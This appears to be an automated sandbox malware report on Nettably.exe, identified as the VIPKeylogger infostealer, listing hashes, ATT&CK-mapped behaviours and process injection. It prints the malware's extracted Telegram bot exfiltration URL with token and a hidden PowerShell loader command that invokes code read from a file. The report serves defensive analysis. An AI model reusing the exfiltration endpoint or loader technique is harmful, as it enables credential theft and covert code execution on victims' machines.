Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
29/08/2024, 11:15
Static task
static1
Behavioral task
behavioral1
Sample
Nettably.exe
Resource
win7-20240704-en
General
-
Target
Nettably.exe
-
Size
698KB
-
MD5
0815e4fcd9b75660891ec15ce119fa70
-
SHA1
7f8c1c73194725dce424b72ff2306203f3590c3b
-
SHA256
89a9123df318a4c77a378e687f5e4c1c7f7806d64c85a7360a556b487343a49b
-
SHA512
c613b96c177294bbbfce2e0b86d15f32d2c7c579bf4c50ef0940ae697e7cfa0f36512ff7fa221c2a5b6963ca6b000b34876707bdc56351c20d20a3ee54fa68ba
-
SSDEEP
12288:67MJHZFQpHB5LOBTCUbINBoQYwXsCGJt5aFp0zS6w+CAG0snsQc:6IJHoph5CBTCUUN6QYwZrH6VfAsQc
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7480851360:AAFGFIgeYioB7dUKsMFuCrt400Zxu2IugeM/sendMessage?chat_id=6070006284
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2548 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 drive.google.com 4 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\legionrernes.Bac Nettably.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2472 ImagingDevices.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2548 powershell.exe 2472 ImagingDevices.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2548 set thread context of 2472 2548 powershell.exe 33 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\underskridelser.ini Nettably.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Fonts\battable.ini Nettably.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Nettably.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ImagingDevices.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2548 powershell.exe 2548 powershell.exe 2548 powershell.exe 2548 powershell.exe 2548 powershell.exe 2548 powershell.exe 2472 ImagingDevices.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2548 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 2472 ImagingDevices.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2116 wrote to memory of 2548 2116 Nettably.exe 30 PID 2116 wrote to memory of 2548 2116 Nettably.exe 30 PID 2116 wrote to memory of 2548 2116 Nettably.exe 30 PID 2116 wrote to memory of 2548 2116 Nettably.exe 30 PID 2548 wrote to memory of 2472 2548 powershell.exe 33 PID 2548 wrote to memory of 2472 2548 powershell.exe 33 PID 2548 wrote to memory of 2472 2548 powershell.exe 33 PID 2548 wrote to memory of 2472 2548 powershell.exe 33 PID 2548 wrote to memory of 2472 2548 powershell.exe 33 PID 2548 wrote to memory of 2472 2548 powershell.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nettably.exe"C:\Users\Admin\AppData\Local\Temp\Nettably.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Kludgy=Get-Content 'C:\Users\Admin\AppData\Local\errancies\Tansies.Tem';$Crushes53=$Kludgy.SubString(52844,3);.$Crushes53($Kludgy)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
51KB
MD55d38b5b5dd9df5889a8cdae91bda8ce0
SHA155d4f7428bfc7a1c572e2f65d2877f53dfe9b00c
SHA25645c83c93a697679fb2f35ba68b3df5393398970f0adbda0f8af697080a661a07
SHA5129632d65d07e63235746f60133dfeaad9474db92a70d2264300d3f433399b0ca0e647120d3393d07e5f722597ec1e14a4111f9b0819886cb11f646d75c1e6be8d
-
Filesize
315KB
MD5657f4fbdce2aec00af95560a9bb2f05f
SHA105d405cdf1e9b5617ff83d7833d7eb4f011a017b
SHA256dc6ea094e7cd8bb7306cb687eb37b1e8c711ea58c626628cd3c70dc329bdde6d
SHA5129f77c539e9e76a3b9f3b77f5e7a771b23881daefd267cce693e77d40b0cb9a0cfb0371c61d9e5395af20d5395c5b0cc886828099ea136f35b87ef9f6ba638b38